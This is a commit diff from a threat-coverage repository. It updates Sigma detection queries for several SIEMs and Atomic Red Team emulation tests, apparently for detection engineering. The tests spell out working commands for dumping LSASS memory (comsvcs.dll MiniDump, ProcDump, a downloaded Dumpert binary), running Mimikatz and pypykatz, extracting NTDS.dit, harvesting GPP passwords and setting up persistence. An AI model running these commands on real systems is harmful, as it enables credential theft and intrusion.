(Image.keyword:(*\\\\svchost.exe *\\\\rundll32.exe *\\\\services.exe *\\\\powershell.exe *\\\\regsvr32.exe *\\\\spoolsv.exe *\\\\lsass.exe *\\\\smss.exe *\\\\csrss.exe *\\\\conhost.exe *\\\\wininit.exe *\\\\lsm.exe *\\\\winlogon.exe *\\\\explorer.exe *\\\\taskhost.exe) AND (NOT (Image.keyword:(C\\:\\\\Windows\\\\System32\\\\* C\\:\\\\Windows\\\\system32\\\\* C\\:\\\\Windows\\\\SysWow64\\\\* C\\:\\\\Windows\\\\SysWOW64\\\\* C\\:\\\\Windows\\\\explorer.exe C\\:\\\\Windows\\\\winsxs\\\\* C\\:\\\\Windows\\\\WinSxS\\\\* \\\\SystemRoot\\\\System32\\\\*))))
```
### splunk
```
((Image="*\\\\svchost.exe" OR Image="*\\\\rundll32.exe" OR Image="*\\\\services.exe" OR Image="*\\\\powershell.exe" OR Image="*\\\\regsvr32.exe" OR Image="*\\\\spoolsv.exe" OR Image="*\\\\lsass.exe" OR Image="*\\\\smss.exe" OR Image="*\\\\csrss.exe" OR Image="*\\\\conhost.exe" OR Image="*\\\\wininit.exe" OR Image="*\\\\lsm.exe" OR Image="*\\\\winlogon.exe" OR Image="*\\\\explorer.exe" OR Image="*\\\\taskhost.exe") NOT ((Image="C:\\\\Windows\\\\System32\\\\*" OR Image="C:\\\\Windows\\\\SysWow64\\\\*" OR Image="C:\\\\Windows\\\\SysWOW64\\\\*" OR Image="C:\\\\Windows\\\\explorer.exe" OR Image="C:\\\\Windows\\\\winsxs\\\\*" OR Image="C:\\\\Windows\\\\WinSxS\\\\*" OR Image="\\\\SystemRoot\\\\System32\\\\*"))) | table ComputerName,User,Image
((Image="*\\\\svchost.exe" OR Image="*\\\\rundll32.exe" OR Image="*\\\\services.exe" OR Image="*\\\\powershell.exe" OR Image="*\\\\regsvr32.exe" OR Image="*\\\\spoolsv.exe" OR Image="*\\\\lsass.exe" OR Image="*\\\\smss.exe" OR Image="*\\\\csrss.exe" OR Image="*\\\\conhost.exe" OR Image="*\\\\wininit.exe" OR Image="*\\\\lsm.exe" OR Image="*\\\\winlogon.exe" OR Image="*\\\\explorer.exe" OR Image="*\\\\taskhost.exe") NOT ((Image="C:\\\\Windows\\\\System32\\\\*" OR Image="C:\\\\Windows\\\\system32\\\\*" OR Image="C:\\\\Windows\\\\SysWow64\\\\*" OR Image="C:\\\\Windows\\\\SysWOW64\\\\*" OR Image="C:\\\\Windows\\\\explorer.exe" OR Image="C:\\\\Windows\\\\winsxs\\\\*" OR Image="C:\\\\Windows\\\\WinSxS\\\\*" OR Image="\\\\SystemRoot\\\\System32\\\\*"))) | table ComputerName,User,Image
```
### logpoint
```
(event_id="1" Image IN ["*\\\\svchost.exe", "*\\\\rundll32.exe", "*\\\\services.exe", "*\\\\powershell.exe", "*\\\\regsvr32.exe", "*\\\\spoolsv.exe", "*\\\\lsass.exe", "*\\\\smss.exe", "*\\\\csrss.exe", "*\\\\conhost.exe", "*\\\\wininit.exe", "*\\\\lsm.exe", "*\\\\winlogon.exe", "*\\\\explorer.exe", "*\\\\taskhost.exe"] -(Image IN ["C:\\\\Windows\\\\System32\\\\*", "C:\\\\Windows\\\\SysWow64\\\\*", "C:\\\\Windows\\\\SysWOW64\\\\*", "C:\\\\Windows\\\\explorer.exe", "C:\\\\Windows\\\\winsxs\\\\*", "C:\\\\Windows\\\\WinSxS\\\\*", "\\\\SystemRoot\\\\System32\\\\*"]))
(event_id="1" Image IN ["*\\\\svchost.exe", "*\\\\rundll32.exe", "*\\\\services.exe", "*\\\\powershell.exe", "*\\\\regsvr32.exe", "*\\\\spoolsv.exe", "*\\\\lsass.exe", "*\\\\smss.exe", "*\\\\csrss.exe", "*\\\\conhost.exe", "*\\\\wininit.exe", "*\\\\lsm.exe", "*\\\\winlogon.exe", "*\\\\explorer.exe", "*\\\\taskhost.exe"] -(Image IN ["C:\\\\Windows\\\\System32\\\\*", "C:\\\\Windows\\\\system32\\\\*", "C:\\\\Windows\\\\SysWow64\\\\*", "C:\\\\Windows\\\\SysWOW64\\\\*", "C:\\\\Windows\\\\explorer.exe", "C:\\\\Windows\\\\winsxs\\\\*", "C:\\\\Windows\\\\WinSxS\\\\*", "\\\\SystemRoot\\\\System32\\\\*"]))
```
### grep
```
grep -P '^(?:.*(?=.*(?:.*.*\\svchost\\.exe|.*.*\\rundll32\\.exe|.*.*\\services\\.exe|.*.*\\powershell\\.exe|.*.*\\regsvr32\\.exe|.*.*\\spoolsv\\.exe|.*.*\\lsass\\.exe|.*.*\\smss\\.exe|.*.*\\csrss\\.exe|.*.*\\conhost\\.exe|.*.*\\wininit\\.exe|.*.*\\lsm\\.exe|.*.*\\winlogon\\.exe|.*.*\\explorer\\.exe|.*.*\\taskhost\\.exe))(?=.*(?!.*(?:.*(?=.*(?:.*C:\\Windows\\System32\\\\.*|.*C:\\Windows\\SysWow64\\\\.*|.*C:\\Windows\\SysWOW64\\\\.*|.*C:\\Windows\\explorer\\.exe|.*C:\\Windows\\winsxs\\\\.*|.*C:\\Windows\\WinSxS\\\\.*|.*\\SystemRoot\\System32\\\\.*))))))'
grep -P '^(?:.*(?=.*(?:.*.*\\svchost\\.exe|.*.*\\rundll32\\.exe|.*.*\\services\\.exe|.*.*\\powershell\\.exe|.*.*\\regsvr32\\.exe|.*.*\\spoolsv\\.exe|.*.*\\lsass\\.exe|.*.*\\smss\\.exe|.*.*\\csrss\\.exe|.*.*\\conhost\\.exe|.*.*\\wininit\\.exe|.*.*\\lsm\\.exe|.*.*\\winlogon\\.exe|.*.*\\explorer\\.exe|.*.*\\taskhost\\.exe))(?=.*(?!.*(?:.*(?=.*(?:.*C:\\Windows\\System32\\\\.*|.*C:\\Windows\\system32\\\\.*|.*C:\\Windows\\SysWow64\\\\.*|.*C:\\Windows\\SysWOW64\\\\.*|.*C:\\Windows\\explorer\\.exe|.*C:\\Windows\\winsxs\\\\.*|.*C:\\Windows\\WinSxS\\\\.*|.*\\SystemRoot\\System32\\\\.*))))))'
```

2
Atomic_Threat_Coverage/Detection_Rules/win_task_folder_evasion.md
View File

@ -24,7 +24,7 @@ description: The Tasks folder in system32 and syswow64 are globally writable pat
references:
- https://twitter.com/subTee/status/1216465628946563073
- https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26
date: 2020/13/01
date: 2020/01/13
author: Sreeman
tags:
- attack.t1064

15
Atomic_Threat_Coverage/Detection_Rules/win_webshell_spawn.md
View File

@ -23,7 +23,7 @@ status: experimental
description: Web servers that spawn shell processes could be the result of a successfully placed web shell or an other attack
author: Thomas Patzke
date: 2019/01/16
modified: 2020/03/03
modified: 2020/03/25
logsource:
category: process_creation
product: windows
@ -40,6 +40,7 @@ detection:
- '*\sh.exe'
- '*\bash.exe'
- '*\powershell.exe'
- '*\bitsadmin.exe'
condition: selection
fields:
- CommandLine
@ -61,42 +62,42 @@ level: high
### es-qs
```
(ParentImage.keyword:(*\\\\w3wp.exe OR *\\\\httpd.exe OR *\\\\nginx.exe OR *\\\\php\\-cgi.exe OR *\\\\tomcat.exe) AND Image.keyword:(*\\\\cmd.exe OR *\\\\sh.exe OR *\\\\bash.exe OR *\\\\powershell.exe))
(ParentImage.keyword:(*\\\\w3wp.exe OR *\\\\httpd.exe OR *\\\\nginx.exe OR *\\\\php\\-cgi.exe OR *\\\\tomcat.exe) AND Image.keyword:(*\\\\cmd.exe OR *\\\\sh.exe OR *\\\\bash.exe OR *\\\\powershell.exe OR *\\\\bitsadmin.exe))
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/8202070f-edeb-4d31-a010-a26c72ac5600 <<EOF\n{\n "metadata": {\n "title": "Shells Spawned by Web Servers",\n "description": "Web servers that spawn shell processes could be the result of a successfully placed web shell or an other attack",\n "tags": [\n "attack.privilege_escalation",\n "attack.persistence",\n "attack.t1100"\n ],\n "query": "(ParentImage.keyword:(*\\\\\\\\w3wp.exe OR *\\\\\\\\httpd.exe OR *\\\\\\\\nginx.exe OR *\\\\\\\\php\\\\-cgi.exe OR *\\\\\\\\tomcat.exe) AND Image.keyword:(*\\\\\\\\cmd.exe OR *\\\\\\\\sh.exe OR *\\\\\\\\bash.exe OR *\\\\\\\\powershell.exe))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(ParentImage.keyword:(*\\\\\\\\w3wp.exe OR *\\\\\\\\httpd.exe OR *\\\\\\\\nginx.exe OR *\\\\\\\\php\\\\-cgi.exe OR *\\\\\\\\tomcat.exe) AND Image.keyword:(*\\\\\\\\cmd.exe OR *\\\\\\\\sh.exe OR *\\\\\\\\bash.exe OR *\\\\\\\\powershell.exe))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Shells Spawned by Web Servers\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\n CommandLine = {{_source.CommandLine}}\\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/8202070f-edeb-4d31-a010-a26c72ac5600 <<EOF\n{\n "metadata": {\n "title": "Shells Spawned by Web Servers",\n "description": "Web servers that spawn shell processes could be the result of a successfully placed web shell or an other attack",\n "tags": [\n "attack.privilege_escalation",\n "attack.persistence",\n "attack.t1100"\n ],\n "query": "(ParentImage.keyword:(*\\\\\\\\w3wp.exe OR *\\\\\\\\httpd.exe OR *\\\\\\\\nginx.exe OR *\\\\\\\\php\\\\-cgi.exe OR *\\\\\\\\tomcat.exe) AND Image.keyword:(*\\\\\\\\cmd.exe OR *\\\\\\\\sh.exe OR *\\\\\\\\bash.exe OR *\\\\\\\\powershell.exe OR *\\\\\\\\bitsadmin.exe))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(ParentImage.keyword:(*\\\\\\\\w3wp.exe OR *\\\\\\\\httpd.exe OR *\\\\\\\\nginx.exe OR *\\\\\\\\php\\\\-cgi.exe OR *\\\\\\\\tomcat.exe) AND Image.keyword:(*\\\\\\\\cmd.exe OR *\\\\\\\\sh.exe OR *\\\\\\\\bash.exe OR *\\\\\\\\powershell.exe OR *\\\\\\\\bitsadmin.exe))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Shells Spawned by Web Servers\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\n CommandLine = {{_source.CommandLine}}\\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
(ParentImage.keyword:(*\\\\w3wp.exe *\\\\httpd.exe *\\\\nginx.exe *\\\\php\\-cgi.exe *\\\\tomcat.exe) AND Image.keyword:(*\\\\cmd.exe *\\\\sh.exe *\\\\bash.exe *\\\\powershell.exe))
(ParentImage.keyword:(*\\\\w3wp.exe *\\\\httpd.exe *\\\\nginx.exe *\\\\php\\-cgi.exe *\\\\tomcat.exe) AND Image.keyword:(*\\\\cmd.exe *\\\\sh.exe *\\\\bash.exe *\\\\powershell.exe *\\\\bitsadmin.exe))
```
### splunk
```
((ParentImage="*\\\\w3wp.exe" OR ParentImage="*\\\\httpd.exe" OR ParentImage="*\\\\nginx.exe" OR ParentImage="*\\\\php-cgi.exe" OR ParentImage="*\\\\tomcat.exe") (Image="*\\\\cmd.exe" OR Image="*\\\\sh.exe" OR Image="*\\\\bash.exe" OR Image="*\\\\powershell.exe")) | table CommandLine,ParentCommandLine
((ParentImage="*\\\\w3wp.exe" OR ParentImage="*\\\\httpd.exe" OR ParentImage="*\\\\nginx.exe" OR ParentImage="*\\\\php-cgi.exe" OR ParentImage="*\\\\tomcat.exe") (Image="*\\\\cmd.exe" OR Image="*\\\\sh.exe" OR Image="*\\\\bash.exe" OR Image="*\\\\powershell.exe" OR Image="*\\\\bitsadmin.exe")) | table CommandLine,ParentCommandLine
```
### logpoint
```
(event_id="1" ParentImage IN ["*\\\\w3wp.exe", "*\\\\httpd.exe", "*\\\\nginx.exe", "*\\\\php-cgi.exe", "*\\\\tomcat.exe"] Image IN ["*\\\\cmd.exe", "*\\\\sh.exe", "*\\\\bash.exe", "*\\\\powershell.exe"])
(event_id="1" ParentImage IN ["*\\\\w3wp.exe", "*\\\\httpd.exe", "*\\\\nginx.exe", "*\\\\php-cgi.exe", "*\\\\tomcat.exe"] Image IN ["*\\\\cmd.exe", "*\\\\sh.exe", "*\\\\bash.exe", "*\\\\powershell.exe", "*\\\\bitsadmin.exe"])
```
### grep
```
grep -P '^(?:.*(?=.*(?:.*.*\\w3wp\\.exe|.*.*\\httpd\\.exe|.*.*\\nginx\\.exe|.*.*\\php-cgi\\.exe|.*.*\\tomcat\\.exe))(?=.*(?:.*.*\\cmd\\.exe|.*.*\\sh\\.exe|.*.*\\bash\\.exe|.*.*\\powershell\\.exe)))'
grep -P '^(?:.*(?=.*(?:.*.*\\w3wp\\.exe|.*.*\\httpd\\.exe|.*.*\\nginx\\.exe|.*.*\\php-cgi\\.exe|.*.*\\tomcat\\.exe))(?=.*(?:.*.*\\cmd\\.exe|.*.*\\sh\\.exe|.*.*\\bash\\.exe|.*.*\\powershell\\.exe|.*.*\\bitsadmin\\.exe)))'
```

123
Atomic_Threat_Coverage/Triggers/T1003.md
View File

@ -145,23 +145,27 @@ The /proc filesystem on Linux contains a great deal of information regarding the
- [Atomic Test #5 - Dump LSASS.exe Memory using ProcDump](#atomic-test-5---dump-lsassexe-memory-using-procdump)
- [Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-6---dump-lsassexe-memory-using-windows-task-manager)
- [Atomic Test #6 - Dump LSASS.exe Memory using comsvcs.dll](#atomic-test-6---dump-lsassexe-memory-using-comsvcsdll)
- [Atomic Test #7 - Offline Credential Theft With Mimikatz](#atomic-test-7---offline-credential-theft-with-mimikatz)
- [Atomic Test #7 - Dump LSASS.exe Memory using direct system calls and API unhooking](#atomic-test-7---dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking)
- [Atomic Test #8 - Dump Active Directory Database with NTDSUtil](#atomic-test-8---dump-active-directory-database-with-ntdsutil)
- [Atomic Test #8 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-8---dump-lsassexe-memory-using-windows-task-manager)
- [Atomic Test #9 - Create Volume Shadow Copy with NTDS.dit](#atomic-test-9---create-volume-shadow-copy-with-ntdsdit)
- [Atomic Test #9 - Offline Credential Theft With Mimikatz](#atomic-test-9---offline-credential-theft-with-mimikatz)
- [Atomic Test #10 - Copy NTDS.dit from Volume Shadow Copy](#atomic-test-10---copy-ntdsdit-from-volume-shadow-copy)
- [Atomic Test #10 - Dump Active Directory Database with NTDSUtil](#atomic-test-10---dump-active-directory-database-with-ntdsutil)
- [Atomic Test #11 - GPP Passwords (findstr)](#atomic-test-11---gpp-passwords-findstr)
- [Atomic Test #11 - Create Volume Shadow Copy with NTDS.dit](#atomic-test-11---create-volume-shadow-copy-with-ntdsdit)
- [Atomic Test #12 - GPP Passwords (Get-GPPPassword)](#atomic-test-12---gpp-passwords-get-gpppassword)
- [Atomic Test #12 - Copy NTDS.dit from Volume Shadow Copy](#atomic-test-12---copy-ntdsdit-from-volume-shadow-copy)
- [Atomic Test #13 - LSASS read with pypykatz](#atomic-test-13---lsass-read-with-pypykatz)
- [Atomic Test #13 - GPP Passwords (findstr)](#atomic-test-13---gpp-passwords-findstr)
- [Atomic Test #14 - Registry parse with pypykatz](#atomic-test-14---registry-parse-with-pypykatz)
- [Atomic Test #14 - GPP Passwords (Get-GPPPassword)](#atomic-test-14---gpp-passwords-get-gpppassword)
- [Atomic Test #15 - LSASS read with pypykatz](#atomic-test-15---lsass-read-with-pypykatz)
- [Atomic Test #16 - Registry parse with pypykatz](#atomic-test-16---registry-parse-with-pypykatz)
<br/>
@ -353,7 +357,7 @@ del %temp%\security >nul 2> nul
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump.
Upon successful execution, you should see a file the following file created C:\Windows\Temp\lsass_dump.dmp.
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
@ -403,7 +407,88 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
<br/>
<br/>
## Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager
## Atomic Test #6 - Dump LSASS.exe Memory using comsvcs.dll
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
**Supported Platforms:** Windows
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
```
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
```
<br/>
<br/>
## Atomic Test #7 - Dump LSASS.exe Memory using direct system calls and API unhooking
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection.
https://github.com/outflanknl/Dumpert
https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
Upon successful execution, you should see the following file created C:\windows\temp\dumpert.dmp.
If you see a message saying "The system cannot find the path specified.", try using the get-prereq_commands to download the tool first.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dumpert_exe | Path of Dumpert executable | Path | PathToAtomicsFolder&#92;T1003&#92;bin&#92;Outflank-Dumpert.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{dumpert_exe}
```
#### Cleanup Commands:
```cmd
del C:\windows\temp\dumpert.dmp >nul 2> nul
```
#### Dependencies: Run with `powershell`!
##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
```
<br/>
<br/>
## Atomic Test #8 - Dump LSASS.exe Memory using Windows Task Manager
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
@ -433,7 +518,7 @@ Manager and administrative permissions.
<br/>
<br/>
## Atomic Test #7 - Offline Credential Theft With Mimikatz
## Atomic Test #9 - Offline Credential Theft With Mimikatz
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
@ -488,7 +573,7 @@ Write-Host "Create the lsass dump manually using the steps in the previous test
<br/>
<br/>
## Atomic Test #8 - Dump Active Directory Database with NTDSUtil
## Atomic Test #10 - Dump Active Directory Database with NTDSUtil
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
@ -535,7 +620,7 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
<br/>
<br/>
## Atomic Test #9 - Create Volume Shadow Copy with NTDS.dit
## Atomic Test #11 - Create Volume Shadow Copy with NTDS.dit
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
@ -578,7 +663,7 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
<br/>
<br/>
## Atomic Test #10 - Copy NTDS.dit from Volume Shadow Copy
## Atomic Test #12 - Copy NTDS.dit from Volume Shadow Copy
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
@ -652,7 +737,7 @@ mkdir #{extract_path}
<br/>
<br/>
## Atomic Test #11 - GPP Passwords (findstr)
## Atomic Test #13 - GPP Passwords (findstr)
Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux.
**Supported Platforms:** Windows
@ -688,7 +773,7 @@ Write-Host Joining this computer to a domain must be done manually
<br/>
<br/>
## Atomic Test #12 - GPP Passwords (Get-GPPPassword)
## Atomic Test #14 - GPP Passwords (Get-GPPPassword)
Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller.
This test is intended to be run from a domain joined workstation, not on the Domain Controller itself.
The Get-GPPPasswords.ps1 executed during this test can be obtained using the get-prereq_commands.
@ -745,7 +830,7 @@ Write-Host Joining this computer to a domain must be done manually
<br/>
<br/>
## Atomic Test #13 - LSASS read with pypykatz
## Atomic Test #15 - LSASS read with pypykatz
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
@ -804,7 +889,7 @@ pip3 install pypykatz
<br/>
<br/>
## Atomic Test #14 - Registry parse with pypykatz
## Atomic Test #16 - Registry parse with pypykatz
Parses registry hives to obtain stored credentials
**Supported Platforms:** Windows

2
Atomic_Threat_Coverage/Triggers/T1015.md
View File

@ -70,7 +70,7 @@ $input_table = "#{parent_list}".split(",")
Foreach ($item in $input_table)
{
$item = $item.trim()
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f | Out-Null
}
```

16
Atomic_Threat_Coverage/Triggers/T1023.md
View File

@ -13,7 +13,8 @@
## Atomic Test #1 - Shortcut Modification
This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell;
gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL
gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL.
Upon execution, calc.exe will be launched.
**Supported Platforms:** Windows
@ -23,16 +24,22 @@ gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-Strin
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| shortcut_file_path | shortcut modified and execute | path | shortcutname.url|
| shortcut_file_path | shortcut modified and execute | path | %temp%&#92;T1023_modified_shortcut.url|
#### Attack Commands: Run with `command_prompt`!
```cmd
echo [InternetShortcut] > test.url && echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} && #{shortcut_file_path} >nul 2>&1
echo [InternetShortcut] > #{shortcut_file_path}
echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path}
#{shortcut_file_path}
```
#### Cleanup Commands:
```cmd
del -f #{shortcut_file_path} >nul 2>&1
```
@ -42,7 +49,8 @@ echo [InternetShortcut] > test.url && echo URL=C:\windows\system32\calc.exe >> #
<br/>
## Atomic Test #2 - Create shortcut to cmd in startup folders
LNK file to launch CMD placed in startup folder
LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"
to view the new shortcut.
**Supported Platforms:** Windows

10
Atomic_Threat_Coverage/Triggers/T1028.md
View File

@ -20,7 +20,7 @@
## Atomic Test #1 - Enable Windows Remote Management
Powershell Enable WinRM
Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access.
Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access.
**Supported Platforms:** Windows
@ -50,7 +50,7 @@ Reference:
https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
Upon successful execution, cmd will spawn calc.exe on a remote computer.
Upon successful execution, cmd will spawn calc.exe on a remote computer.
**Supported Platforms:** Windows
@ -63,11 +63,11 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer.
| computer_name | Name of Computer | string | computer1|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `powershell`!
```cmd
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
```powershell
[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
```

2
Atomic_Threat_Coverage/Triggers/T1031.md
View File

@ -35,7 +35,7 @@ sc start Fax
#### Cleanup Commands:
```cmd
sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe"
sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul 2>&1
```

2
Atomic_Threat_Coverage/Triggers/T1032.md
View File

@ -35,7 +35,7 @@ Upon successful execution, powershell will make a network connection to 127.0.0.
```powershell
$server_ip = #{server_ip}
$server_port = #{server_port}
$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', #{server_port})
$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', '#{server_port}')
$stream = $socket.GetStream()
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient('fake.domain', $null, "Tls12", $false)

2
Atomic_Threat_Coverage/Triggers/T1035.md
View File

@ -77,7 +77,7 @@ Upon successful execution, powershell will download psexec.exe and spawn calc.ex
##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path "#{psexec_exe}"") { exit 0} else { exit 1}
if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
```
##### Get Prereq Commands:
```powershell

33
Atomic_Threat_Coverage/Triggers/T1037.md
View File

@ -28,7 +28,8 @@ Mac allows login and logoff hooks to be run as root whenever a specific user log
<br/>
## Atomic Test #1 - Logon Scripts
Adds a registry value to run batch script created in the C:\Windows\Temp directory.
Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key
that can be viewed in the Registry Editor.
**Supported Platforms:** Windows
@ -38,7 +39,7 @@ Adds a registry value to run batch script created in the C:\Windows\Temp directo
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script_path | Path to .bat file | String | $env:SystemRoot&#92;Temp&#92;art.bat|
| script_path | Path to .bat file | String | %temp%&#92;art.bat|
| script_command | Command To Execute | String | echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%&#92;desktop&#92;T1037-log.txt|
@ -46,15 +47,15 @@ Adds a registry value to run batch script created in the C:\Windows\Temp directo
```cmd
echo cmd /c "#{script_command}" > #{script_path}
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}"
echo "#{script_command}" > #{script_path}
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f
```
#### Cleanup Commands:
```cmd
REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f
del #{script_path} >nul 2>nul
del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>nul
REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1
del #{script_path} >nul 2>&1
del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>&1
```
@ -65,7 +66,8 @@ del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>nul
<br/>
## Atomic Test #2 - Scheduled Task Startup Script
Run an exe on user logon or system startup
Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view
the tasks, open the Task Scheduler and look in the Active Tasks pane.
**Supported Platforms:** Windows
@ -83,8 +85,8 @@ schtasks /create /tn "T1037_OnStartup" /sc onstart /ru system /tr "cmd.exe /c ca
#### Cleanup Commands:
```cmd
schtasks /delete /tn "T1037_OnLogon" /f
schtasks /delete /tn "T1037_OnStartup" /f
schtasks /delete /tn "T1037_OnLogon" /f >nul 2>&1
schtasks /delete /tn "T1037_OnStartup" /f >nul 2>&1
```
@ -129,7 +131,9 @@ Mac logon script
<br/>
## Atomic Test #4 - Supicious vbs file run from startup Folder
vbs files can be placed in and ran from the startup folder to maintain persistance
vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1137 Hello, World VBS!" will be displayed twice.
